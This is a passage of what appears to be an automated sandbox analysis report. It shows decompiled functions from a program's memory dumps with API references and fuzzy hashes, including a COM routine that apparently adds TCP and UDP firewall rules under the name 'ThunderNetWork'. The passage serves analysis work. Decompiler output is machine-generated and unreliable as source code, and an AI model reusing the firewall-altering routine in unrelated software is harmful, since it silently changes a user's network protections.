                                                                                                                                                      				return _t11;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00407194
                                                                                                                                                      • LoadStringW.USER32(00412E48,00000000,?,00001000), ref: 004071AC
                                                                                                                                                        • Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
                                                                                                                                                        • Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$LoadString_itow
                                                                                                                                                      • String ID: ;t@
                                                                                                                                                      • API String ID: 2363904170-3941608961
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004073D0(wchar_t* __esi) {
                                                                                                                                                      				wchar_t* _t2;
                                                                                                                                                      				wchar_t* _t6;
                                                                                                                                                      
                                                                                                                                                      				_t6 = __esi;
                                                                                                                                                      				E00405800(__esi);
                                                                                                                                                      				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                                                                      				if(_t2 != 0) {
                                                                                                                                                      					 *_t2 =  *_t2 & 0x00000000;
                                                                                                                                                      				}
                                                                                                                                                      				return wcscat(_t6, L"_lng.ini");
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                      • wcsrchr.MSVCRT ref: 004073D9
                                                                                                                                                      • wcscat.MSVCRT ref: 004073EF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                      • Opcode ID: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
                                                                                                                                                      • Instruction ID: d66fa5373373d5564c67ff94d3685b1a514421eeb891155236f9d41770c1593b
                                                                                                                                                      • Opcode Fuzzy Hash: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
                                                                                                                                                      • Instruction Fuzzy Hash: AEC0125394561154E12132125C03B4F21448F06314F70003BFC06744C2ABFD6115C06F
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E004075A6(intOrPtr* __esi, void* __eflags) {
                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                      
                                                                                                                                                      				_t42 = __esi;
                                                                                                                                                      				 *__esi = 0x410168;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x2f0)) = 0;
                                                                                                                                                      				_t33 = E00405CF8(0x34c, __esi);
                                                                                                                                                      				_push(0x14);
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x33c)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x348)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x2dc)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x2a0)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x2f4)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x2f8)) = 0xfff;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x20)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x2a8)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x2ec)) = 1;
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				if(_t33 == 0) {
                                                                                                                                                      					_t33 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 0xc)) = 0;
                                                                                                                                                      					 *_t33 = 0;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 4)) = 0;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 8)) = 0;
                                                                                                                                                      				}
                                                                                                                                                      				_push(0x14);
                                                                                                                                                      				 *((intOrPtr*)(_t42 + 8)) = _t33;
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				if(_t33 == 0) {
                                                                                                                                                      					_t33 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 0xc)) = 0;
                                                                                                                                                      					 *_t33 = 0;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 4)) = 0;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 8)) = 0;
                                                                                                                                                      				}
                                                                                                                                                      				_push(0x14);
                                                                                                                                                      				 *((intOrPtr*)(_t42 + 0xc)) = _t33;
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				if(_t33 == 0) {
                                                                                                                                                      					_t33 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 0xc)) = 0;
                                                                                                                                                      					 *_t33 = 0;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 4)) = 0;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 8)) = 0;
                                                                                                                                                      				}
                                                                                                                                                      				_push(0x14);
                                                                                                                                                      				 *((intOrPtr*)(_t42 + 0x10)) = _t33;
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				if(_t33 == 0) {
                                                                                                                                                      					_t33 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 0xc)) = 0;
                                                                                                                                                      					 *_t33 = 0;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 4)) = 0;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
                                                                                                                                                      					 *((intOrPtr*)(_t33 + 8)) = 0;
                                                                                                                                                      				}
                                                                                                                                                      				 *((intOrPtr*)(_t42 + 0x14)) = _t33;
                                                                                                                                                      				return _t42;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                      • Opcode ID: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                      • Instruction ID: 6ad8090dc912b32accdf13bb09e5540cd70d669e40ded14db292eecac2a9bd8b
                                                                                                                                                      • Opcode Fuzzy Hash: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                      • Instruction Fuzzy Hash: 7F31B2B0945B018ED7648F2BC484A56FAE8BF90310F2589AFD15ADB2B1D7F99440CF15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406264(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				int _t32;
                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                      				intOrPtr _t36;
                                                                                                                                                      				signed int _t48;
                                                                                                                                                      				signed int _t58;
                                                                                                                                                      				signed int _t59;
                                                                                                                                                      				void** _t62;
                                                                                                                                                      				void** _t63;
                                                                                                                                                      				signed int* _t66;
                                                                                                                                                      
                                                                                                                                                      				_t66 = __eax;
                                                                                                                                                      				_t32 = wcslen(_a4);
                                                                                                                                                      				_t48 =  *(_t66 + 4);
                                                                                                                                                      				_t58 = _t48 + _t32;
                                                                                                                                                      				_v12 = _t58;
                                                                                                                                                      				_t59 = _t58 + 1;
                                                                                                                                                      				_v8 = _t32;
                                                                                                                                                      				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                                                                      				 *(_t66 + 4) = _t59;
                                                                                                                                                      				_t62 = _t66 + 0x10;
                                                                                                                                                      				if(_t59 != 0xffffffff) {
                                                                                                                                                      					E0040562D(_t66, _t59, _t62, 2, _t33);
                                                                                                                                                      				} else {
                                                                                                                                                      					free( *_t62);
                                                                                                                                                      				}
                                                                                                                                                      				_t60 =  *(_t66 + 0x1c);
                                                                                                                                                      				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                                      				_t63 = _t66 + 0xc;
                                                                                                                                                      				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                                                                      					E0040562D(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                                                                      				} else {
                                                                                                                                                      					free( *_t63);
                                                                                                                                                      				}
                                                                                                                                                      				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                                                                      				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                                                                      				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                                                                      				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                                                                      				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                                                                      				return _t30;
                                                                                                                                                      			}
















                                                                                                                                                      APIs
                                                                                                                                                      • wcslen.MSVCRT ref: 00406271
                                                                                                                                                      • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74784E00,?,00000000), ref: 00406294
                                                                                                                                                        • Part of subcall function 0040562D: malloc.MSVCRT ref: 00405649
                                                                                                                                                        • Part of subcall function 0040562D: memcpy.MSVCRT ref: 00405661
                                                                                                                                                        • Part of subcall function 0040562D: free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74784E00,?,00000000), ref: 0040566A
                                                                                                                                                      • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74784E00,?,00000000), ref: 004062B7
                                                                                                                                                      • memcpy.MSVCRT ref: 004062DB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                      • Opcode ID: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                      • Instruction ID: 328e5c77b206eb01c5c4dd085cb03c2c4ac654035e51f3c9fb1ea2fb7f212fdc
                                                                                                                                                      • Opcode Fuzzy Hash: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                      • Instruction Fuzzy Hash: 3A21AEB1600704EFC730EF19D881C9AB7F9EF483247104A2EF856A7291D775B925CB58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Executed Functions

                                                                                                                                                      APIs
                                                                                                                                                      • CoCreateInstance.OLE32(0099DB0C,00000000,00000001,0099DB1C,?,00991135,00000000), ref: 0099106A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 542301482-0
                                                                                                                                                      • Opcode ID: 11af1fa5adb227a6d9f638b3a2dcba05370f674d6bbf44341c5235ed2570aa45
                                                                                                                                                      • Instruction ID: acf17e723457af0994cc4f5cd35ffaad6df0082fd96e8f6c570a0d934d10f02b
                                                                                                                                                      • Opcode Fuzzy Hash: 11af1fa5adb227a6d9f638b3a2dcba05370f674d6bbf44341c5235ed2570aa45
                                                                                                                                                      • Instruction Fuzzy Hash: 6CB012307DD30076DD201748CDC7F057A1167C0F04F110400B200240E6C2E20080E705
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E00991372(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				void* _v20;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                      				intOrPtr _t87;
                                                                                                                                                      				intOrPtr* _t88;
                                                                                                                                                      				intOrPtr* _t89;
                                                                                                                                                      				intOrPtr* _t90;
                                                                                                                                                      				intOrPtr* _t95;
                                                                                                                                                      				intOrPtr _t96;
                                                                                                                                                      				intOrPtr* _t97;
                                                                                                                                                      				intOrPtr _t98;
                                                                                                                                                      				intOrPtr _t100;
                                                                                                                                                      				intOrPtr* _t101;
                                                                                                                                                      				intOrPtr* _t103;
                                                                                                                                                      				intOrPtr* _t105;
                                                                                                                                                      				intOrPtr* _t107;
                                                                                                                                                      				intOrPtr* _t109;
                                                                                                                                                      				intOrPtr* _t111;
                                                                                                                                                      				intOrPtr* _t113;
                                                                                                                                                      				intOrPtr* _t115;
                                                                                                                                                      				intOrPtr _t118;
                                                                                                                                                      				intOrPtr* _t119;
                                                                                                                                                      				intOrPtr* _t121;
                                                                                                                                                      				intOrPtr* _t123;
                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                      				intOrPtr* _t127;
                                                                                                                                                      				intOrPtr* _t129;
                                                                                                                                                      				intOrPtr* _t131;
                                                                                                                                                      				intOrPtr* _t133;
                                                                                                                                                      				void* _t135;
                                                                                                                                                      				void* _t163;
                                                                                                                                                      				void* _t166;
                                                                                                                                                      				signed int _t167;
                                                                                                                                                      				intOrPtr* _t169;
                                                                                                                                                      
                                                                                                                                                      				_t167 = 0;
                                                                                                                                                      				_v16 = 0x80004005;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v28 = E009980F0(__edx, _a4);
                                                                                                                                                      				_v32 = E009980F0(__edx, "ThunderNetWork");
                                                                                                                                                      				_t85 = E009980F0(__edx, _a8);
                                                                                                                                                      				_v36 = _t85;
                                                                                                                                                      				__imp__CoInitializeEx(0, 2, _t166); // executed
                                                                                                                                                      				_v40 = _t85;
                                                                                                                                                      				if(_t85 == 0x80010106 || _t85 >= 0) {
                                                                                                                                                      					_t87 = E00991058( &_v24,  &_v24);
                                                                                                                                                      					_v16 = _t87;
                                                                                                                                                      					if(_t87 >= _t167) {
                                                                                                                                                      						_t95 = _v24;
                                                                                                                                                      						_t96 =  *((intOrPtr*)( *_t95 + 0x48))(_t95,  &_v20);
                                                                                                                                                      						_v16 = _t96;
                                                                                                                                                      						if(_t96 >= _t167) {
                                                                                                                                                      							_t97 = _v24;
                                                                                                                                                      							_t98 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97,  &_v12);
                                                                                                                                                      							_v16 = _t98;
                                                                                                                                                      							if(_t98 >= _t167) {
                                                                                                                                                      								if((_v12 & 0x00000004) != 0 && _v12 != 4) {
                                                                                                                                                      									_v12 = _v12 ^ 0x00000004;
                                                                                                                                                      								}
                                                                                                                                                      								_t169 = __imp__CoCreateInstance;
                                                                                                                                                      								_t100 =  *_t169(0x99db2c, _t167, 1, 0x99db3c,  &_v8, _t163, _t135); // executed
                                                                                                                                                      								_v16 = _t100;
                                                                                                                                                      								if(_t100 >= 0) {
                                                                                                                                                      									_t101 = _v8;
                                                                                                                                                      									 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v28);
                                                                                                                                                      									_t103 = _v8;
                                                                                                                                                      									 *((intOrPtr*)( *_t103 + 0x28))(_t103, _v32);
                                                                                                                                                      									_t105 = _v8;
                                                                                                                                                      									 *((intOrPtr*)( *_t105 + 0x30))(_t105, _v36);
                                                                                                                                                      									_t107 = _v8;
                                                                                                                                                      									 *((intOrPtr*)( *_t107 + 0x40))(_t107, 6);
                                                                                                                                                      									_t109 = _v8;
                                                                                                                                                      									 *((intOrPtr*)( *_t109 + 0x98))(_t109, _v12);
                                                                                                                                                      									_t111 = _v8;
                                                                                                                                                      									 *((intOrPtr*)( *_t111 + 0xa8))(_t111, 1);
                                                                                                                                                      									_t113 = _v8;
                                                                                                                                                      									 *((intOrPtr*)( *_t113 + 0x88))(_t113, 0xffffffff);
                                                                                                                                                      									_t115 = _v20;
                                                                                                                                                      									 *((intOrPtr*)( *_t115 + 0x20))(_t115, _v8);
                                                                                                                                                      									_t118 =  *_t169(0x99db2c, 0, 1, 0x99db3c,  &_v8);
                                                                                                                                                      									_v16 = _t118;
                                                                                                                                                      									if(_t118 >= 0) {
                                                                                                                                                      										_t119 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t119 + 0x20))(_t119, _v28);
                                                                                                                                                      										_t121 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t121 + 0x28))(_t121, _v32);
                                                                                                                                                      										_t123 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t123 + 0x30))(_t123, _v36);
                                                                                                                                                      										_t125 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t125 + 0x40))(_t125, 0x11);
                                                                                                                                                      										_t127 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t127 + 0x98))(_t127, _v12);
                                                                                                                                                      										_t129 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t129 + 0xa8))(_t129, 1);
                                                                                                                                                      										_t131 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t131 + 0x88))(_t131, 0xffffffff);
                                                                                                                                                      										_t133 = _v20;
                                                                                                                                                      										_v16 =  *((intOrPtr*)( *_t133 + 0x20))(_t133, _v8);
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								_t167 = 0;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t88 = _v8;
                                                                                                                                                      				if(_t88 != _t167) {
                                                                                                                                                      					 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                                                                                                      				}
                                                                                                                                                      				_t89 = _v20;
                                                                                                                                                      				if(_t89 != _t167) {
                                                                                                                                                      					 *((intOrPtr*)( *_t89 + 8))(_t89);
                                                                                                                                                      				}
                                                                                                                                                      				_t90 = _v24;
                                                                                                                                                      				if(_t90 != _t167) {
                                                                                                                                                      					 *((intOrPtr*)( *_t90 + 8))(_t90);
                                                                                                                                                      				}
                                                                                                                                                      				if(_v40 >= _t167) {
                                                                                                                                                      					__imp__CoUninitialize(); // executed
                                                                                                                                                      				}
                                                                                                                                                      				return _v16;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991391
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099139E
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009913A9
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002,80004005,ThunderNetWork,?), ref: 009913B4
                                                                                                                                                      • CoCreateInstance.OLE32(0099DB2C,00000000,00000001,0099DB3C,?), ref: 0099143C
                                                                                                                                                      • CoCreateInstance.OLE32(0099DB2C,00000000,00000001,0099DB3C,?), ref: 009914B9
                                                                                                                                                      • CoUninitialize.OLE32 ref: 0099155C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$ByteCharCreateErrorInstanceLastMultiWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                      • String ID: ThunderNetWork
                                                                                                                                                      • API String ID: 3644708077-3075295172
                                                                                                                                                      • Opcode ID: 076bde71e6531ce76e43649b736fb49c75c0068297d266bb1197b992bd830d9f
                                                                                                                                                      • Instruction ID: 09fa0f343c8280fa12cb38e51f2beaf27b814c30f0f5aafa88fc2546e9a05fd6
                                                                                                                                                      • Opcode Fuzzy Hash: 076bde71e6531ce76e43649b736fb49c75c0068297d266bb1197b992bd830d9f
                                                                                                                                                      • Instruction Fuzzy Hash: 8C719875A00219EFCF00DFE8C888A9EBBB9BF89715F204499F505EB251CB759A41DF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                      			E009974CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				long _t21;
                                                                                                                                                      				long _t23;
                                                                                                                                                      				long _t24;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				long _t31;
                                                                                                                                                      				signed int _t32;
                                                                                                                                                      				signed int _t33;
                                                                                                                                                      				signed int _t39;
                                                                                                                                                      				signed int _t45;
                                                                                                                                                      				long _t49;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_push(0x99dec8);
                                                                                                                                                      				E00993F70(__ebx, __edi, __esi);
                                                                                                                                                      				_t39 =  *(_t52 + 8);
                                                                                                                                                      				if(_t39 <= 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t49 = _t39 *  *(_t52 + 0xc);
                                                                                                                                                      					 *(_t52 + 8) = _t49;
                                                                                                                                                      					__eflags = _t49;
                                                                                                                                                      					if(_t49 == 0) {
                                                                                                                                                      						_t49 = 1;
                                                                                                                                                      						__eflags = 1;
                                                                                                                                                      					}
                                                                                                                                                      					do {
                                                                                                                                                      						_t38 = 0;
                                                                                                                                                      						 *(_t52 - 0x1c) = 0;
                                                                                                                                                      						__eflags = _t49 - 0xffffffe0;
                                                                                                                                                      						if(_t49 > 0xffffffe0) {
                                                                                                                                                      							L13:
                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                      							if(_t38 != 0) {
                                                                                                                                                      								L21:
                                                                                                                                                      								_t21 = _t38;
                                                                                                                                                      								L22:
                                                                                                                                                      								return E00993FB5(_t21);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *0x9a0a20; // 0x0
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								__eflags = _t38;
                                                                                                                                                      								if(_t38 == 0) {
                                                                                                                                                      									_t23 =  *(_t52 + 0x10);
                                                                                                                                                      									__eflags = _t23;
                                                                                                                                                      									if(_t23 != 0) {
                                                                                                                                                      										 *_t23 = 0xc;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								goto L21;
                                                                                                                                                      							}
                                                                                                                                                      							goto L15;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *0x9a0a98 - 3;
                                                                                                                                                      						if( *0x9a0a98 != 3) {
                                                                                                                                                      							L11:
                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                      							if(_t38 != 0) {
                                                                                                                                                      								goto L21;
                                                                                                                                                      							}
                                                                                                                                                      							L12:
                                                                                                                                                      							_t25 = RtlAllocateHeap( *0x9a093c, 8, _t49); // executed
                                                                                                                                                      							_t38 = _t25;
                                                                                                                                                      							goto L13;
                                                                                                                                                      						}
                                                                                                                                                      						_t49 = _t49 + 0x0000000f & 0xfffffff0;
                                                                                                                                                      						 *(_t52 + 0xc) = _t49;
                                                                                                                                                      						__eflags =  *(_t52 + 8) -  *0x9a0a84; // 0x0
                                                                                                                                                      						if(__eflags > 0) {
                                                                                                                                                      							goto L11;
                                                                                                                                                      						}
                                                                                                                                                      						E00993C3D(0, 4);
                                                                                                                                                      						 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                                                                      						_push( *(_t52 + 8));
                                                                                                                                                      						 *(_t52 - 0x1c) = E00996CFF();
                                                                                                                                                      						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
                                                                                                                                                      						E009975C8();
                                                                                                                                                      						_t38 =  *(_t52 - 0x1c);
                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                      							goto L12;
                                                                                                                                                      						}
                                                                                                                                                      						E00994E20(0, _t38, 0,  *(_t52 + 8));
                                                                                                                                                      						_t53 = _t53 + 0xc;
                                                                                                                                                      						goto L11;
                                                                                                                                                      						L15:
                                                                                                                                                      						_t24 = E009945B5(_t49);
                                                                                                                                                      						__eflags = _t24;
                                                                                                                                                      					} while (_t24 != 0);
                                                                                                                                                      					_t31 =  *(_t52 + 0x10);
                                                                                                                                                      					__eflags = _t31;
                                                                                                                                                      					if(_t31 != 0) {
                                                                                                                                                      						 *_t31 = 0xc;
                                                                                                                                                      					}
                                                                                                                                                      					L3:
                                                                                                                                                      					_t21 = 0;
                                                                                                                                                      					goto L22;
                                                                                                                                                      				}
                                                                                                                                                      				_t32 = 0xffffffe0;
                                                                                                                                                      				_t33 = _t32 / _t39;
                                                                                                                                                      				_t45 = _t32 % _t39;
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				_t58 = _t33 + 1;
                                                                                                                                                      				if(_t33 + 1 != 0) {
                                                                                                                                                      					goto L4;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *((intOrPtr*)(E009938CA(_t58))) = 0xc;
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_push(0);
                                                                                                                                                      					E00993862(_t45, 0, __esi);
                                                                                                                                                      					goto L3;
